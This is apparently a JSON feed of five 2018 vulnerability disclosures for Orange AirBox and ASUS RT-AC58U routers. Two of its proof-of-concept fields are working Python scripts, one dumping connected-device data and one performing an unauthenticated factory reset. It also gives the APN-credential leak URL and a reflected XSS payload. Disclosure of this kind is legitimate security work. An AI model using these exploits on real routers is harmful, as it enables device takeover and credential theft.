{"gna":{"short_name":"Adrian Dacka","full_name":"Adrian \"syrex1013\" Dacka","gcve_url":"https://32b0a928.cve-disclosure-site.pages.dev"},"generated_at":"2026-05-22T17:54:56.257Z","count":5,"vulnerabilities":[{"cveId":"CVE-2018-18375","title":"goform/getProfileList in Orange AirBox Y858_FL_01","severity":"Critical","cvssScore":"9.8","vulnerabilityType":"Information Disclosure","datePublished":"2018-10-15","affectedSoftware":"orange airbox_firmware","affectedVersions":"Y858_FL_01.16_04","description":"goform/getProfileList in Orange AirBox Y858_FL_01.16_04 allows attackers to extract APN data (name, number, username, and password) via the rand parameter.","technicalDetails":"AirBoxAPNLeaks is a Python-based proof-of-concept exploit demonstrating CVE-2018-18375, a security vulnerability affecting Orange AirBox routers running firmware Y858_FL_01.16_04. The tool exploits an exposed HTTP endpoint (/goform/getProfileList) that leaks sensitive APN (Access Point Name) configuration details including usernames, passwords, and phone numbers without authentication. The implementation utilizes the requests library to send HTTP GET requests to the vulnerable router and parse the returned HTML content containing the leaked credentials. This vulnerability allows attackers on the local network to steal external IP addresses and mobile network authentication credentials, posing significant privacy and security risks. The repository contains a single 15-line Python script with command-line argument parsing for specifying target router IP addresses.","poc":"AirBox has hidden webpage http://192.168.1.1/goform/getProfileList?rand= which prints detailed APN info. It can be used to steal external ip addresses.\n","credits":"Adrian \"syrex1013\" Dacka","references":"https://github.com/remix30303/AirBoxAPNLeaks\n","id":"CVE-2018-18375"},{"cveId":"CVE-2018-18376","title":"goform/getWlanClientInfo in Orange AirBox ","severity":"High","cvssScore":"7.5","vulnerabilityType":"Information Disclosure","datePublished":"2018-10-15","affectedSoftware":"orange airbox_firmware","affectedVersions":"Y858_FL_01.16_04","description":"goform/getWlanClientInfo in Orange AirBox Y858_FL_01.16_04 allows remote attackers to discover information about currently connected devices (hostnames, IP addresses, MAC addresses, and connection time) via the rand parameter.","technicalDetails":"AirBox has hidden webpage http://192.168.1.1/goform/getWlanClientInfo?rand= which prints currently connected devices ip,hostnames,mac addresses and connection time.\n\n","poc":"import argparse\nimport requests\nimport re\n\ndef ExtractDHCP(ip):\n\turl='http://{}/goform/getWlanClientInfo?rand='.format(ip)\n\tr = requests.get(url)\n\thtml = str(r.content)\n\tprint(html)\n\t\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description='Aribox DHCP extract')\n\tparser.add_argument('-ip', action ='store', dest='ip', help=\"IP of router\",default=max)\n\tresults = parser.parse_args()\n\tExtractDHCP(results.ip)","credits":"Adrian \"syrex1013\" Dacka","references":"https://github.com/remix30303/AirboxLeak\n","id":"CVE-2018-18376"},{"cveId":"CVE-2018-18377","title":"goform/setReset on Orange AirBox ","severity":"High","cvssScore":"7.5","vulnerabilityType":"Authorization Bypass","datePublished":"2018-10-15","affectedSoftware":"orange airbox_firmware","affectedVersions":"Y858_FL_01.16_04","description":"goform/setReset on Orange AirBox Y858_FL_01.16_04 devices allows attackers to reset a router to factory settings, which can be used to login using the default admin:admin credentials.","technicalDetails":"t: The vulnerability exists in the goform/setReset endpoint on the device web interface.\nType of Vulnerability: Missing Authorization (CWE-862). The device does not enforce any authentication or authorization when accessing the reset function.\nAttack Mechanism: An unauthenticated attacker on the same network (or with the ability to send requests to the device) can POST to the /goform/setReset endpoint.\nImpact: The device is reset to factory settings. Following the reset, the attacker can log in using the default credentials (admin:admin). This can allow the attacker to take full control of the device, alter configurations, or intercept network traffic passing through the router.","poc":"import argparse\nimport requests\nimport re\n\ndef ResetSettingsToFactory(ip):\n\turl='http://{}/goform/setReset'.format(ip)\n\tr = requests.get(url)\n\t\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description='Aribox Password Reset')\n\tparser.add_argument('-ip', action ='store', dest='ip', help=\"IP of router\",default=max)\n\tresults = parser.parse_args()\n\tResetSettingsToFactory(results.ip)","credits":"Adrian \"syrex1013\" Dacka","references":"https://github.com/remix30303/AirBoxDoom\n","id":"CVE-2018-18377"},{"cveId":"CVE-2018-18287","title":"ASUS RT-AC58U Information Disclosure","severity":"Medium","cvssScore":"5.3","vulnerabilityType":"Information Disclosure","datePublished":"2018-10-14","affectedSoftware":"ASUS RT-AC58U Firmware","affectedVersions":"<=3.0.0.4.380_6516","description":"CVE-2018-18287 is an information disclosure vulnerability that affects ASUS routers running specific firmware versions. The vulnerability exists in the router's web interface and allows unauthorized access to sensitive network data.","technicalDetails":"The vulnerability is present in the main login page (Main_Login.asp) and additional pages of the router's web interface. These pages inadvertently expose:\n\nDHCP Lease Information: Complete list of devices connected to the network, including IP addresses and hostnames\nNetwork Time Information: Current time, date, and system uptime statistics\nNetwork Topology: Details about active network clients\nThis information is accessible without authentication, allowing any user with network access to the router's web interface to extract sensitive data about the network and connected devices.","poc":"DHCP Leak Extraction:\n\nSends an HTTP GET request to http://[router-ip]/Main_Login.asp\nParses the JavaScript variable dhcpLeaseInfo from the response\nExtracts and formats the list of connected devices with their IP addresses and hostnames\nTime Information Extraction:\n\nSends an HTTP GET request to http://[router-ip]/update_clients.asp\nExtracts the current_time value from the response\nDisplays the router's current time, date, and uptime information\nBoth requests are made without any authentication, demonstrating the severity of the vulnerability.","credits":"Adrian \"syrex1013\" Dacka","references":"https://github.com/remix30303/AsusLeak\n","id":"CVE-2018-18287"},{"cveId":"CVE-2018-18291","title":"A cross site scripting (XSS) vulnerability on ASUS RT-AC58U ","severity":"Medium","cvssScore":"6.1","vulnerabilityType":"XSS (Cross-Site Scripting)","datePublished":"2018-10-14","affectedSoftware":"asus rt-ac58u_firmware","affectedVersions":"<=3.0.0.4.380_6516 ","description":"A cross site scripting (XSS) vulnerability on ASUS RT-AC58U 3.0.0.4.380_6516 devices allows remote attackers to inject arbitrary web script or HTML via Advanced_ASUSDDNS_Content.asp, Advanced_WSecurity_Content.asp, Advanced_Wireless_Content.asp, Logout.asp, Main_Login.asp, MobileQIS_Login.asp, QIS_wizard.htma, YandexDNS.asp, ajax_status.xml, apply.cgi, clients.asp, disk.asp, disk_utility.asp, or internet.asp.","technicalDetails":"The vulnerability affects multiple ASP pages including Advanced_Wireless_Content.asp, Main_Login.asp, and various other administrative components that are accessible without authentication. The exploit works by crafting a malicious URL containing JavaScript injection (e.g., 192.168.1.1/Advanced_Wireless_Content.aspn9mn0'-alert(1)-'grqb0) which the router reflects back in an unescaped script tag during the redirect to the login page. The vulnerability allows attackers to execute arbitrary JavaScript in victims' browsers when they open the prepared URL, potentially leading to session hijacking or credential theft. This is a security research repository documenting the vulnerability discovered in October 2018.","poc":"192.168.1.1/Advanced_Wireless_Content.aspn9mn0'-alert(1)-'grqb0","credits":"Adrian \"syrex1013\" Dacka","references":"https://github.com/remix30303/AsusXSS/\n","id":"CVE-2018-18291"}]}